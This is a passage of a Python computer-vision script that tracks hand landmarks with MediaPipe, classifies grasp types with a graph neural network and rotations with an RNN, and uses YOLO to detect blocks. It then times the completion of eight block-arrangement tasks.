mask_face_02 = cv2.threshold(gray_face_02, 1, 255, cv2.THRESH_BINARY)\r\nret_03, mask_face_03 = cv2.threshold(gray_face_03, 1, 255, cv2.THRESH_BINARY)\r\nret_04, mask_face_04 = cv2.threshold(gray_face_04, 1, 255, cv2.THRESH_BINARY)\r\nret_05, mask_face_05 = cv2.threshold(gray_face_05, 1, 255, cv2.THRESH_BINARY)\r\nret_06, mask_face_06 = cv2.threshold(gray_face_06, 1, 255, cv2.THRESH_BINARY)\r\n\r\n####################\r\n\r\nimg_00 = cv2.imread(r'C:\\Users\\anomt\\Desktop\\BDT\\FILES\\TEST_100x100\\00.jpg')\r\nimg_01 = cv2.imread(r'C:\\Users\\anomt\\Desktop\\BDT\\FILES\\TEST_100x100\\01.jpg')\r\nimg_02 = cv2.imread(r'C:\\Users\\anomt\\Desktop\\BDT\\FILES\\TEST_100x100\\02.jpg')\r\nimg_03 = cv2.imread(r'C:\\Users\\anomt\\Desktop\\BDT\\FILES\\TEST_100x100\\03.jpg')\r\nimg_04 = cv2.imread(r'C:\\Users\\anomt\\Desktop\\BDT\\FILES\\TEST_100x100\\04.jpg')\r\nimg_05 = cv2.imread(r'C:\\Users\\anomt\\Desktop\\BDT\\FILES\\TEST_100x100\\05.jpg')\r\nimg_06 = cv2.imread(r'C:\\Users\\anomt\\Desktop\\BDT\\FILES\\TEST_100x100\\06.jpg')\r\nimg_07 = cv2.imread(r'C:\\Users\\anomt\\Desktop\\BDT\\FILES\\TEST_100x100\\07.jpg')\r\nimg_08 = cv2.imread(r'C:\\Users\\anomt\\Desktop\\BDT\\FILES\\TEST_100x100\\08.jpg')\r\nimg_09 = cv2.imread(r'C:\\Users\\anomt\\Desktop\\BDT\\FILES\\TEST_100x100\\09.jpg')\r\n\r\ngray_img_00 = cv2.cvtColor(img_00, cv2.COLOR_BGR2GRAY)\r\ngray_img_01 = cv2.cvtColor(img_01, cv2.COLOR_BGR2GRAY)\r\ngray_img_02 = cv2.cvtColor(img_02, cv2.COLOR_BGR2GRAY)\r\ngray_img_03 = cv2.cvtColor(img_03, cv2.COLOR_BGR2GRAY)\r\ngray_img_04 = cv2.cvtColor(img_04, cv2.COLOR_BGR2GRAY)\r\ngray_img_05 = cv2.cvtColor(img_05, cv2.COLOR_BGR2GRAY)\r\ngray_img_06 = cv2.cvtColor(img_06, cv2.COLOR_BGR2GRAY)\r\ngray_img_07 = cv2.cvtColor(img_07, cv2.COLOR_BGR2GRAY)\r\ngray_img_08 = cv2.cvtColor(img_08, cv2.COLOR_BGR2GRAY)\r\ngray_img_09 = cv2.cvtColor(img_09, cv2.COLOR_BGR2GRAY)\r\n\r\nret_img_00, mask_img_00 = cv2.threshold(gray_img_00, 1, 255, cv2.THRESH_BINARY)\r\nret_img_01, mask_img_01 = cv2.threshold(gray_img_01, 1, 255, cv2.THRESH_BINARY)\r\nret_img_02, mask_img_02 = cv2.threshold(gray_img_02, 1, 255, cv2.THRESH_BINARY)\r\nret_img_03, mask_img_03 = cv2.threshold(gray_img_03, 1, 255, cv2.THRESH_BINARY)\r\nret_img_04, mask_img_04 = cv2.threshold(gray_img_04, 1, 255, cv2.THRESH_BINARY)\r\nret_img_05, mask_img_05 = cv2.threshold(gray_img_05, 1, 255, cv2.THRESH_BINARY)\r\nret_img_06, mask_img_06 = cv2.threshold(gray_img_06, 1, 255, cv2.THRESH_BINARY)\r\nret_img_07, mask_img_07 = cv2.threshold(gray_img_07, 1, 255, cv2.THRESH_BINARY)\r\nret_img_08, mask_img_08 = cv2.threshold(gray_img_08, 1, 255, cv2.THRESH_BINARY)\r\nret_img_09, mask_img_09 = cv2.threshold(gray_img_09, 1, 255, cv2.THRESH_BINARY)\r\n\r\n####################\r\n\r\nn_frame = 0 \r\nn_capture = 1 # Normal 3 # Realtime 7\r\n#n_contour = 0\r\nn_test = 0\r\n\r\ntimer_task_all = []\r\ntimer_return = 0\r\n\r\ntimer_task_01 = 0\r\ntimer_task_02 = 0\r\ntimer_task_03 = 0\r\ntimer_task_03 = 0\r\ntimer_task_04 = 0\r\ntimer_task_05 = 0\r\ntimer_task_06 = 0\r\ntimer_task_07 = 0\r\ntimer_task_08 = 0\r\n\r\ntimer_flag_01 = True\r\ntimer_flag_02 = True\r\ntimer_flag_03 = True\r\ntimer_flag_04 = True\r\ntimer_flag_05 = True\r\ntimer_flag_06 = True\r\ntimer_flag_07 = True\r\ntimer_flag_08 = True\r\n\r\nans_01 = [2,1,1,2]\r\nans_02 = [1,3,1,1]\r\nans_03 = [2,2,3,4]\r\nans_04 = [5,1,4,1]\r\nans_05 = [4,3,5,6]\r\nans_06 = [1,4,6,1]\r\nans_07 = [5,6,4,3]\r\nans_08 = [5,3,4,5]\r\n\r\ngrasp_pose = [0,0,0,0,0,0,0]\r\n\r\nstart_zero = time.time()\r\nstart = 
time.time()\r\n\r\n\r\n\r\nwith mp_hands.Hands(min_detection_confidence=0.8, min_tracking_confidence=0.5) as hands:\r\n\r\n while cap.isOpened():\r\n\r\n ret, frame = cap.read()\r\n if not ret:\r\n break\r\n\r\n ret, frame_next = cap.read()\r\n\r\n if ret:\r\n \r\n f_height, f_width, f_channel = frame.shape\r\n\r\n #width = 960 # int(img.shape[1] * scale_percent / 100) \r\n #height = 540 # int(img.shape[0] * scale_percent / 100)\r\n #dim = (width, height)\r\n #frame = cv2.resize(frame, dim, interpolation = cv2.INTER_AREA)\r\n\r\n if(n_frame % n_capture == 0 ):\r\n\r\n #>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> Hand Detection\r\n\r\n timer_task = round (time.time() - start , 2)\r\n\r\n grasp_type = None\r\n rotate_type = None \r\n box_near_hand = None\r\n\r\n task_state = 0\r\n thumb_state = 0\r\n\r\n\r\n # Brightness and Contrast\r\n #alpha = 1.5\r\n #beta = 5\r\n #frame = cv2.addWeighted(frame, alpha, np.zeros(frame.shape, frame.dtype), 0, beta)\r\n \r\n # BGR 2 RGB\r\n frame_hand = cv2.cvtColor(frame_next, cv2.COLOR_BGR2RGB)\r\n # Set flag\r\n frame_hand.flags.writeable = False\r\n # Hand Detections\r\n results = hands.process(frame_hand)\r\n # Set flag to true\r\n frame_hand.flags.writeable = True\r\n # RGB 2 BGR\r\n frame_hand = cv2.cvtColor(frame_hand, cv2.COLOR_RGB2BGR)\r\n\r\n hand_status = False\r\n hand_angle = [0,0,0,0,0,0,0,0,0,0,0,0,0,0,0]\r\n hand_position = [0,0,0,0,0,0,0,0,0]\r\n stream = [0,0,0,0,0,0,0,0,0,0,0,0,0,0,0]\r\n\r\n list_hand_x = []\r\n list_hand_y = []\r\n \r\n ### If hand detected\r\n\r\n # Rendering results\r\n if results.multi_hand_landmarks:\r\n for num, hand in enumerate(results.multi_hand_landmarks):\r\n mp_drawing.draw_landmarks(frame, hand, mp_hands.HAND_CONNECTIONS, \r\n mp_drawing.DrawingSpec(color=(121, 22, 76), thickness=3, circle_radius=4),\r\n mp_drawing.DrawingSpec(color=(250, 44, 250), thickness=3, circle_radius=2),\r\n )\r\n \r\n # Render left or right detection\r\n #if get_label(num, hand, results):\r\n # text, coord = get_label(num, hand, results)\r\n # cv2.putText(image, text, coord, cv2.FONT_HERSHEY_SIMPLEX, 1, (50, 50, 50), 1, cv2.LINE_AA)\r\n \r\n hand_status = True\r\n\r\n ### Measure Angle \r\n # Draw angles to image from joint list\r\n draw_finger_angles(frame, results, joint_list_0)\r\n draw_finger_angles(frame, results, joint_list_1)\r\n draw_finger_angles(frame, results, joint_list_2)\r\n draw_finger_angles(frame, results, joint_list_3)\r\n draw_finger_angles(frame, results, joint_list_4)\r\n\r\n angle_0 = get_finger_angles(results, joint_list_0)\r\n angle_1 = get_finger_angles(results, joint_list_1)\r\n angle_2 = get_finger_angles(results, joint_list_2)\r\n angle_3 = get_finger_angles(results, joint_list_3)\r\n angle_4 = get_finger_angles(results, joint_list_4)\r\n\r\n hand_angle = [ angle_0[0], angle_0[1], angle_0[2],\r\n angle_1[0], angle_1[1], angle_1[2],\r\n angle_2[0], angle_2[1], angle_2[2], \r\n angle_3[0], angle_3[1], angle_3[2],\r\n angle_4[0], angle_4[1], angle_4[2] ]\r\n\r\n timer = round (time.time() - start_zero , 2) \r\n \r\n #writer_ang.writerow([ timer, timer_task, \r\n # angle_0[0], angle_0[1], angle_0[2],\r\n # angle_1[0], angle_1[1], angle_1[2],\r\n # angle_2[0], angle_2[1], angle_2[2], \r\n # angle_3[0], angle_3[1], angle_3[2],\r\n # angle_4[0], angle_4[1], angle_4[2], thumb_state ])\r\n\r\n #print( str(timer) + \" - \" + str(hand_angle) )\r\n\r\n ### Measure Distance\r\n \r\n # Create new variabel for wrist \r\n wrist = np.array( [hand.landmark[9].x, hand.landmark[9].y] 
)\r\n\r\n # Create new variabel for fingertip\r\n tip_0 = np.array([hand.landmark[4].x, hand.landmark[4].y] ) # , hand.landmark[4].z\r\n tip_1 = np.array([hand.landmark[8].x, hand.landmark[8].y] ) # , hand.landmark[8].z\r\n tip_2 = np.array([hand.landmark[12].x, hand.landmark[12].y] ) # , hand.landmark[12].z\r\n tip_3 = np.array([hand.landmark[16].x, hand.landmark[16].y] ) # , hand.landmark[16].z\r\n tip_4 = np.array([hand.landmark[20].x, hand.landmark[20].y] ) # , hand.landmark[20].z\r\n \r\n # Area of Hand\r\n \r\n for i in range(21):\r\n list_hand_x.append(hand.landmark[i].x)\r\n list_hand_y.append(hand.landmark[i].y)\r\n \r\n min_hand_x = int (min(list_hand_x) * f_width)\r\n min_hand_y = int (min(list_hand_y) * f_height)\r\n\r\n max_hand_x = int (max(list_hand_x) * f_width)\r\n max_hand_y = int (max(list_hand_y) * f_height)\r\n \r\n cv2.rectangle(frame, (min_hand_x, min_hand_y),(max_hand_x, max_hand_y), (255, 0, 0), 2) \r\n\r\n\r\n\r\n\r\n # Drawing circle in fingertip\r\n \"\"\"\r\n frame = cv2.circle(frame, ( int (hand.landmark[4].x * vwidth), \r\n int (hand.landmark[4].y * vheight)), \r\n radius=10, color=(0, 0, 100), thickness=-1)\r\n \r\n frame = cv2.circle(frame, ( int (hand.landmark[8].x * vwidth), \r\n int (hand.landmark[8].y * vheight)), \r\n radius=10, color=(0, 0, 100), thickness=-1)\r\n\r\n frame = cv2.circle(frame, ( int (hand.landmark[12].x * vwidth), \r\n int (hand.landmark[12].y * vheight)), \r\n radius=10, color=(0, 0, 100), thickness=-1)\r\n \r\n frame = cv2.circle(frame, ( int (hand.landmark[16].x * vwidth), \r\n int (hand.landmark[16].y * vheight)), \r\n radius=10, color=(0, 0, 100), thickness=-1)\r\n \r\n frame = cv2.circle(frame, ( int (hand.landmark[20].x * vwidth), \r\n int (hand.landmark[20].y * vheight)), \r\n radius=10, color=(0, 0, 100), thickness=-1)\r\n \"\"\"\r\n\r\n \r\n \r\n #>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> PREDICT ACTION\r\n\r\n #stream = stream.decode().split(',')\r\n #stream = [eval(i) for i in stream] #round((eval(i)/3.14), 2)\r\n\r\n stream[0] = angle_0[0] / 180\r\n stream[1] = angle_0[1] / 180\r\n stream[2] = angle_0[2] / 180\r\n stream[3] = angle_1[0] / 180\r\n stream[4] = angle_1[1] / 180\r\n stream[5] = angle_1[2] / 180\r\n stream[6] = angle_2[0] / 180\r\n stream[7] = angle_2[1] / 180\r\n stream[8] = angle_2[2] / 180\r\n stream[9] = angle_3[0] / 180\r\n stream[10] = angle_3[1] / 180\r\n stream[11] = angle_3[2] / 180\r\n stream[12] = angle_4[0] / 180\r\n stream[13] = angle_4[1] / 180\r\n stream[14] = angle_4[2] / 180\r\n\r\n x = torch.tensor([ [1],\r\n [stream[0]], [stream[1]], [stream[2]], \r\n [stream[3]], [stream[4]], [stream[5]],\r\n [stream[6]], [stream[7]], [stream[8]],\r\n [stream[9]], [stream[10]], [stream[11]],\r\n [stream[12]], [stream[13]], [stream[14]] ], dtype=torch.float)\r\n #print(x)\r\n \r\n data = Data(x=x, edge_index=edge_index.t().contiguous()) \r\n\r\n output_gnn = model_gnn(data.x, data.edge_index, data.batch) #\r\n predicted_gnn = (torch.max(torch.exp(output_gnn), 1)[1]).data.cpu().numpy()\r\n \r\n #predicted_gnn = torch.max(output_gnn, 1)\r\n\r\n probs = torch.nn.functional.softmax(output_gnn, dim=1)\r\n str_probs = str( format((torch.max(probs).item()*100),\".2f\") )\r\n\r\n if predicted_gnn.item() == 0:\r\n cv2.putText(frame, \"Rake \" + str_probs + \"%\" , (min_hand_x, max_hand_y), cv2.FONT_HERSHEY_SIMPLEX, 2, (255,255,255), 2)\r\n grasp_pose[0]+=1\r\n\r\n elif predicted_gnn.item() == 1:\r\n cv2.putText(frame, \"Palmar Grasp \" + str_probs + \"%\" , (min_hand_x, max_hand_y), cv2.FONT_HERSHEY_SIMPLEX, 
2, (255,255,255), 2)\r\n grasp_pose[1]+=1\r\n\r\n elif predicted_gnn.item() == 2:\r\n cv2.putText(frame, \"Radial Palmar Grasp \" + str_probs + \"%\" , (min_hand_x, max_hand_y), cv2.FONT_HERSHEY_SIMPLEX, 2, (255,255,255), 2)\r\n grasp_pose[2]+=1\r\n\r\n elif predicted_gnn.item() == 3:\r\n cv2.putText(frame, \"Radial Digital Grasp \" + str_probs + \"%\" , (min_hand_x, max_hand_y), cv2.FONT_HERSHEY_SIMPLEX, 2, (255,255,255), 2)\r\n grasp_pose[3]+=1\r\n\r\n elif predicted_gnn.item() == 4:\r\n cv2.putText(frame, \"Inferior Pincher \" + str_probs + \"%\" , (min_hand_x, max_hand_y), cv2.FONT_HERSHEY_SIMPLEX, 2, (255,255,255), 2)\r\n grasp_pose[4]+=1\r\n \r\n elif predicted_gnn.item() == 5:\r\n cv2.putText(frame, \"Pincher \" + str_probs + \"%\" , (min_hand_x, max_hand_y), cv2.FONT_HERSHEY_SIMPLEX, 2, (255,255,255), 2) \r\n grasp_pose[5]+=1\r\n\r\n elif predicted_gnn.item() == 6:\r\n \r\n if hand.landmark[20].z > hand.landmark[4].z:\r\n cv2.putText(frame, \"Thumbs UP \" + str_probs + \"%\" , (min_hand_x, max_hand_y), cv2.FONT_HERSHEY_SIMPLEX, 2, (255,255,255), 2)\r\n thumb_state = 1\r\n\r\n else:\r\n cv2.putText(frame, \"Thumbs DOWN \" + str_probs + \"%\" , (min_hand_x, max_hand_y), cv2.FONT_HERSHEY_SIMPLEX, 2, (255,255,255), 2) \r\n thumb_state = -1 \r\n \r\n grasp_pose[6]+=1\r\n\r\n grasp_type = predicted_gnn.item()\r\n\r\n\r\n #>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> PREDICT ACTION\r\n\r\n # Feature Scaling\r\n coll_hand.append(hand_angle)\r\n\r\n if len(coll_hand) == sequence_length:\r\n\r\n x_data = np.array(list(coll_hand))\r\n x_train = sc_input.transform(x_data)\r\n x_train = torch.tensor(x_train, dtype=torch.float32).to(device)\r\n x_train = x_train[None, :, :]\r\n \r\n output_rnn = model_rnn(x_train)\r\n confidence_rnn, predicted_rnn = torch.max(output_rnn.data, 1)\r\n \r\n str_conf = str( format(confidence_rnn.item()*10,\".2f\") )\r\n '''\r\n if predicted_rnn.item() == 0:\r\n cv2.putText(frame, \"No Rotation \" + str_conf + \"%\", (150, 150), cv2.FONT_HERSHEY_SIMPLEX, 2, (255,255,255), 2)\r\n elif predicted_rnn.item() == 1:\r\n cv2.putText(frame, \"Rotate Type 1 \" + str_conf + \"%\", (150, 150), cv2.FONT_HERSHEY_SIMPLEX, 2, (255,255,255), 2)\r\n elif predicted_rnn.item() == 2:\r\n cv2.putText(frame, \"Rotate Type 2 \" + str_conf + \"%\", (150, 150), cv2.FONT_HERSHEY_SIMPLEX, 2, (255,255,255), 2)\r\n elif predicted_rnn.item() == 3:\r\n cv2.putText(frame, \"Rotate Type 3 \" + str_conf + \"%\", (150, 150), cv2.FONT_HERSHEY_SIMPLEX, 2, (255,255,255), 2)\r\n elif predicted_rnn.item() == 4:\r\n cv2.putText(frame, \"Rotate Type 4 \" + str_conf + \"%\", (150, 150), cv2.FONT_HERSHEY_SIMPLEX, 2, (255,255,255), 2)\r\n elif predicted_rnn.item() == 5:\r\n cv2.putText(frame, \"Rotate Type 5 \" + str_conf + \"%\", (150, 150), cv2.FONT_HERSHEY_SIMPLEX, 2, (255,255,255), 2)\r\n elif predicted_rnn.item() == 6:\r\n cv2.putText(frame, \"Rotate Type 6 \" + str_conf + \"%\", (150, 150), cv2.FONT_HERSHEY_SIMPLEX, 2, (255,255,255), 2) #+ str_conf + \"%\"\r\n '''\r\n rotate_type = predicted_rnn.item()\r\n #print(predicted.item())\r\n\r\n\r\n\r\n\r\n\r\n #>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> Block Detection\r\n\r\n # Frame threshold \r\n imgBlur = cv2.GaussianBlur(frame, (7,7), 1)\r\n imgGray = cv2.cvtColor(imgBlur, cv2.COLOR_BGR2GRAY)\r\n ret, imgThres = cv2.threshold(imgGray, 195, 255, cv2.THRESH_BINARY)\r\n \r\n # Make detections \r\n results = model_yolo(frame_next)\r\n\r\n df_tracked_objects = results.pandas().xyxy[0]\r\n list_tracked_objects = 
df_tracked_objects.values.tolist()\r\n                    #print(list_tracked_objects)\r\n                    \r\n                    #if len(list_tracked_objects) == 4: #>0\r\n\r\n                    box_num = 0\r\n                    box_face = 0\r\n                    box_list = []\r\n                    box_design = []\r\n                    box_distance = []\r\n                    box_design_sort = []\r\n\r\n                    box_near_hand = []\r\n                    #avg_confidence = []\r\n\r\n                    pos_x = []\r\n                    pos_y = []\r\n\r\n                    for x1, y1, x2, y2, conf_pred, cls_id, cls in list_tracked_objects:\r\n\r\n                        if conf_pred > 0.8:\r\n\r\n                            #avg_confidence.append( round(conf_pred,2) )\r\n\r\n                            center_x = int ((x1+x2)/2)\r\n                            center_y = int ((y1+y2)/2)\r\n                            x1 = int(x1)\r\n                            x2 = int(x2)\r\n                            y1 = int(y1)\r\n                            y2 = int(y2)\r\n                            w = int (x2-x1)\r\n                            h = int (y2-y1)\r\n\r\n                            box_distance.append( int (math.sqrt( pow(center_x, 2) + pow(center_y, 2) )) )\r\n                            #print(center_x, center_y)\r\n\r\n                            pos_x.append( int (center_x) )\r\n                            pos_y.append( int (center_y) )\r\n                            \r\n                            dim = (100, 100)\r\n                            imgBox = cv2.resize(imgThres[y1:y2, x1:x2], dim, interpolation = cv2.INTER_AREA)\r\n                            #cv2.imshow(\"Box_\"+str(box_num), imgBox)\r\n                            \r\n                            box_class = [ imgBox[50,25], imgBox[75,50], imgBox[50,75], imgBox[25,50] ]\r\n\r\n                            if box_class == [0,0,0,0] :\r\n                                box_face = 1\r\n                                box_design.append(1)\r\n                            elif box_class == [255,255,255,255]:\r\n                                box_face = 2\r\n                                box_design.append(2)\r\n                            #... separated\r\n                            elif box_class == [255,255,0,0]:\r\n                                box_face = 3\r\n                                box_design.append(3)    \r\n                            elif box_class == [255,0,0,255]:\r\n                                box_face = 4\r\n                                box_design.append(4)    \r\n                            elif box_class == [0,0,255,255]:\r\n                                box_face = 5\r\n                                box_design.append(5)    \r\n                            elif box_class == [0,255,255,0]:\r\n                                box_face = 6\r\n                                box_design.append(6)    \r\n                            \r\n                            cv2.rectangle(frame, (x1,y1), (x1+w, y1+h), (0, 255, 0), 2)\r\n\r\n                            # Select Block Inside Hand\r\n\r\n                            if hand_status == True:\r\n                                if (center_x > min_hand_x-150 and center_x < max_hand_x+150 ) and (center_y > min_hand_y-150 and center_y < max_hand_y+150):\r\n                                    cv2.rectangle(frame, (x1,y1), (x1+w, y1+h), (0, 0, 255), 5)\r\n                                    box_near_hand.append(box_face)\r\n                                    #print(box_face)\r\n                                #else:\r\n                                #    print(0)\r\n                            #else:\r\n                            #    print(0)\r\n                            \r\n                            cv2.putText(frame, str(round(conf_pred,2)), (int(x1), int(y1) - 10), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 255, 0), 2)\r\n                            #cv2.putText(frame, \"id:\" +str(box_num), (int(x1), int(y1) - 10), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 255, 0), 2)\r\n\r\n                            box_num = box_num + 1\r\n                            roi_label = frame[y1:y1+50, x1:x1+50]\r\n\r\n                            if(box_face == 1):\r\n                                roi_label [np.where(mask_face_01)] = 0\r\n                                roi_label += face_01\r\n                            elif(box_face == 2):\r\n                                roi_label [np.where(mask_face_02)] = 0\r\n                                roi_label += face_02\r\n                            elif(box_face == 3):\r\n                                roi_label [np.where(mask_face_03)] = 0\r\n                                roi_label += face_03\r\n                            elif(box_face == 4):\r\n                                roi_label [np.where(mask_face_04)] = 0\r\n                                roi_label += face_04\r\n                            elif(box_face == 5):\r\n                                roi_label [np.where(mask_face_05)] = 0\r\n                                roi_label += face_05\r\n                            elif(box_face == 6):\r\n                                roi_label [np.where(mask_face_06)] = 0\r\n                                roi_label += face_06\r\n                            \r\n                    # Draw objects features\r\n                    #cv2.circle(frame, (x, y), radius=5, color=(0, 255, 0), thickness=-1)\r\n                    #cv2.rectangle(frame, (int(x1), int(y1)), (int(x2), int(y2)), (0, 255, 0), 2)\r\n                    #cv2.putText(frame, cls , (int(x1), int(y1) - 10), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 255, 0), 2)\r\n\r\n                    #print(box_design)\r\n                    #print (box_near_hand)\r\n\r\n                    \r\n\r\n\r\n                    if len(box_design) == 4 and len(box_distance) == 4:\r\n\r\n                        # >>>>>>>>>>>>\r\n\r\n                        box_0 = (pos_x[0], pos_y[0])\r\n                        box_1 = (pos_x[1], pos_y[1])\r\n                        box_2 = (pos_x[2], pos_y[2])\r\n                        box_3 = (pos_x[3], pos_y[3])\r\n\r\n                        frame = cv2.line(frame, box_0, box_1, (0, 0, 0), 2)\r\n                        frame = 
cv2.line(frame, box_0, box_2, (0, 0, 0), 2)\r\n frame = cv2.line(frame, box_0, box_3, (0, 0, 0), 2)\r\n frame = cv2.line(frame, box_1, box_2, (0, 0, 0), 2)\r\n frame = cv2.line(frame, box_1, box_3, (0, 0, 0), 2)\r\n frame = cv2.line(frame, box_2, box_3, (0, 0, 0), 2)\r\n\r\n pos_x_order = [ pos_x[0], pos_x[1], pos_x[2], pos_x[3] ]\r\n pos_y_order = [ pos_y[0], pos_y[1], pos_y[2], pos_y[3] ]\r\n\r\n #if ( abs(pos_x[0] - pos_x[1]) < 100) and \\\r\n # ( abs(pos_x[0] - pos_x[2]) < 100) and \\\r\n # ( abs(pos_x[0] - pos_x[3]) < 100) and \\\r\n # ( abs(pos_x[1] - pos_x[2]) < 100) and \\\r\n # ( abs(pos_x[1] - pos_x[3]) < 100) and \\\r\n # ( abs(pos_x[2] - pos_x[3]) < 100):\r\n\r\n # start = time.time()\r\n \r\n #elif( abs(pos_y[0] - pos_y[1]) < 100) and \\\r\n # ( abs(pos_y[0] - pos_y[2]) < 100) and \\\r\n # ( abs(pos_y[0] - pos_y[3]) < 100) and \\\r\n # ( abs(pos_y[1] - pos_y[2]) < 100) and \\\r\n # ( abs(pos_y[1] - pos_y[3]) < 100) and \\\r\n # ( abs(pos_y[2] - pos_y[3]) < 100):\r\n\r\n # start = time.time()\r\n\r\n # >>>>>>>>>>>>\r\n\r\n len_0 = int (math.sqrt( (pos_x[0]-pos_x[1])**2 + (pos_y[0]-pos_y[1])**2 ) )\r\n len_1 = int (math.sqrt( (pos_x[1]-pos_x[2])**2 + (pos_y[1]-pos_y[2])**2 ) )\r\n len_2 = int (math.sqrt( (pos_x[2]-pos_x[3])**2 + (pos_y[2]-pos_y[3])**2 ) )\r\n len_3 = int (math.sqrt( (pos_x[3]-pos_x[0])**2 + (pos_y[3]-pos_y[0])**2 ) )\r\n len_4 = int (math.sqrt( (pos_x[0]-pos_x[2])**2 + (pos_y[0]-pos_y[2])**2 ) )\r\n len_5 = int (math.sqrt( (pos_x[1]-pos_x[3])**2 + (pos_y[1]-pos_y[3])**2 ) )\r\n\r\n # Order Len\r\n len_order = [ len_0, len_1, len_2, len_3, len_4, len_5 ]\r\n len_rect = sorted(len_order)\r\n\r\n if ( abs(len_rect[0] - len_rect[1]) < 50) and \\\r\n ( abs(len_rect[0] - len_rect[2]) < 50) and \\\r\n ( abs(len_rect[0] - len_rect[3]) < 50) and \\\r\n ( abs(len_rect[1] - len_rect[2]) < 50) and \\\r\n ( abs(len_rect[1] - len_rect[3]) < 50) and \\\r\n ( abs(len_rect[2] - len_rect[3]) < 50):\r\n\r\n # >>>>>>>>>>>>\r\n \r\n sort_index = sorted(range(len(box_distance)), key=lambda k: box_distance[k])\r\n\r\n for i in range(len(sort_index)):\r\n box_design_sort.append(box_design[sort_index[i]])\r\n \r\n print(\"----- TASK :\" + str(box_design_sort))\r\n\r\n if box_design_sort == ans_01:\r\n test_label = frame[20:120, 20:120]\r\n test_label [np.where(mask_img_01)] = 0\r\n test_label += img_01\r\n task_state = 1\r\n \r\n if(timer_flag_01):\r\n end = time.time()\r\n timer_task_01 = round((end-start - timer_return), 2)\r\n timer_task_all.append(timer_task_01)\r\n\r\n print (\"TASK 1 COMPLETED in \" + str(timer_task_01) +\" seconds\")\r\n timer_flag_01 = False\r\n else:\r\n print (\"TASK 1 COMPLETED in \" + str(timer_task_01) +\" seconds\")\r\n start = time.time()\r\n \r\n \r\n elif box_design_sort == ans_02:\r\n test_label = frame[20:120, 20:120]\r\n test_label [np.where(mask_img_02)] = 0\r\n test_label += img_02\r\n task_state = 1\r\n \r\n if(timer_flag_02):\r\n end = time.time()\r\n timer_task_02 = round((end-start - timer_return), 2)\r\n timer_task_all.append(timer_task_02)\r\n\r\n print (\"TASK 2 COMPLETED in \" + str(timer_task_02) +\" seconds\")\r\n timer_flag_02 = False\r\n else:\r\n print (\"TASK 2 COMPLETED in \" + str(timer_task_02) +\" seconds\")\r\n start = time.time()\r\n \r\n \r\n elif box_design_sort == ans_03:\r\n test_label = frame[20:120, 20:120]\r\n test_label [np.where(mask_img_03)] = 0\r\n test_label += img_03\r\n task_state = 1\r\n\r\n if(timer_flag_03):\r\n end = time.time()\r\n timer_task_03 = round((end-start - timer_return), 2)\r\n 
timer_task_all.append(timer_task_03)\r\n\r\n print (\"TASK 3 COMPLETED in \" + str(timer_task_03) +\" seconds\")\r\n timer_flag_03 = False\r\n else:\r\n print (\"TASK 3 COMPLETED in \" + str(timer_task_03) +\" seconds\")\r\n start = time.time()\r\n \r\n \r\n elif box_design_sort == ans_04:\r\n test_label = frame[20:120, 20:120]\r\n test_label [np.where(mask_img_04)] = 0\r\n test_label += img_04\r\n task_state = 1\r\n \r\n if(timer_flag_04):\r\n end = time.time()\r\n timer_task_04 = round((end-start - timer_return), 2)\r\n timer_task_all.append(timer_task_04)\r\n \r\n print (\"TASK 4 COMPLETED in \" + str(timer_task_04) +\" seconds\")\r\n timer_flag_04 = False\r\n else:\r\n print (\"TASK 4 COMPLETED in \" + str(timer_task_04) +\" seconds\")\r\n start = time.time()\r\n \r\n \r\n elif box_design_sort == ans_05:\r\n test_label = frame[20:120, 20:120]\r\n test_label [np.where(mask_img_05)] = 0\r\n test_label += img_05\r\n task_state = 1\r\n \r\n if(timer_flag_05):\r\n end = time.time()\r\n timer_task_05 = round((end-start - timer_return), 2)\r\n timer_task_all.append(timer_task_05)\r\n\r\n print (\"TASK 5 COMPLETED in \" + str(timer_task_05) +\" seconds\")\r\n timer_flag_05 = False\r\n else:\r\n print (\"TASK 5 COMPLETED in \" + str(timer_task_05) +\" seconds\")\r\n start = time.time()\r\n \r\n \r\n elif box_design_sort == ans_06:\r\n test_label = frame[20:120, 20:120]\r\n test_label [np.where(mask_img_06)] = 0\r\n test_label += img_06\r\n task_state = 1\r\n \r\n if(timer_flag_06):\r\n end = time.time()\r\n timer_task_06 = round((end-start - timer_return), 2)\r\n timer_task_all.append(timer_task_06)\r\n\r\n print (\"TASK 6 COMPLETED in \" + str(timer_task_06) +\" seconds\")\r\n timer_flag_06 = False\r\n else:\r\n print (\"TASK 6 COMPLETED in \" + str(timer_task_06) +\" seconds\")\r\n start = time.time()\r\n \r\n \r\n elif box_design_sort == ans_07:\r\n test_label = frame[20:120, 20:120]\r\n test_label [np.where(mask_img_07)] = 0\r\n test_label += img_07\r\n task_state = 1\r\n \r\n if(timer_flag_07):\r\n end = time.time()\r\n timer_task_07 = round((end-start - timer_return), 2)\r\n timer_task_all.append(timer_task_07)\r\n \r\n print (\"TASK 7 COMPLETED in \" + str(timer_task_07) +\" seconds\")\r\n timer_flag_07 = False\r\n else:\r\n print (\"TASK 7 COMPLETED in \" + str(timer_task_07) +\" seconds\")\r\n start = time.time()\r\n \r\n \r\n elif box_design_sort == ans_08:\r\n test_label = frame[20:120, 20:120]\r\n test_label [np.where(mask_img_08)] = 0\r\n test_label += img_08\r\n task_state = 1\r\n \r\n if(timer_flag_08):\r\n end = time.time()\r\n timer_task_08 = round((end-start - timer_return), 2)\r\n timer_task_all.append(timer_task_08)\r\n \r\n print (\"TASK 8 COMPLETED in \" + str(timer_task_08) +\" seconds\")\r\n timer_flag_08 = False\r\n else:\r\n print (\"TASK 8 COMPLETED in \" + str(timer_task_08) +\" seconds\")\r\n start = time.time()\r\n \r\n\r\n else:\r\n print (\"NOT COMPLETE\")\r\n\r\n box_design = []\r\n box_distance = []\r\n box_design_sort = []\r\n\r\n\r\n #cv2.imshow('Stream', frame)\r\n\r\n #else:\r\n # cv2.imshow('Stream', frame_next)\r\n \r\n #elif len(box_design) != 0 :\r\n #sort_index = sorted(range(len(box_distance)), key=lambda k: box_distance[k])\r\n\r\n #for i in 